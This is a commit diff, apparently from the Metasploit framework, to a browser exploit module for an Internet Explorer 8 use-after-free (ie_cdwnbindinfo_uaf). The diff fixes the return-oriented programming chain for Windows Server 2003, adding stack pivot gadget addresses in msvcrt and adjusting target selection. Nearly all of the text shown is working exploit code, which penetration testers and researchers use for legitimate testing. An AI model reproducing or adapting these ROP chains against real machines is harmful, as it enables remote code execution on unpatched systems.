Skip to content

Commit cd58cc7

Browse files
author
jvazquez-r7
committed
fixed rop chain for w2003
1 parent cab84b5 commit cd58cc7

File tree

1 file changed

+13
-9
lines changed

1 file changed

+13
-9
lines changed

modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb

Lines changed: 13 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -58,8 +58,8 @@ def initialize(info={})
5858
[ 'Automatic', {} ],
5959
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
6060
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
61-
[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
62-
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30
61+
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
62+
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
6363
],
6464
'Privileged' => false,
6565
'DisclosureDate' => "Dec 27 2012",
@@ -90,9 +90,6 @@ def get_target(agent)
9090
os_name = 'Windows Vista'
9191
when '6.1'
9292
os_name = 'Windows 7'
93-
else
94-
# OS not supported
95-
return nil
9693
end
9794

9895
targets.each do |t|
@@ -152,10 +149,17 @@ def get_payload(t, cli)
152149
case t['Rop']
153150
when :msvcrt
154151
print_status("Using msvcrt ROP")
155-
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
156-
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
157-
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
158-
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
152+
if t['Name'] =~ /Windows XP/
153+
stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
154+
stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret
155+
stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
156+
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
157+
else
158+
stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
159+
stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret
160+
stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c
161+
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
162+
end
159163
else
160164
print_status("Using JRE ROP")
161165
stack_pivot = [0x7c348b06].pack("V") * 54 # ret

0 commit comments

Comments
 (0)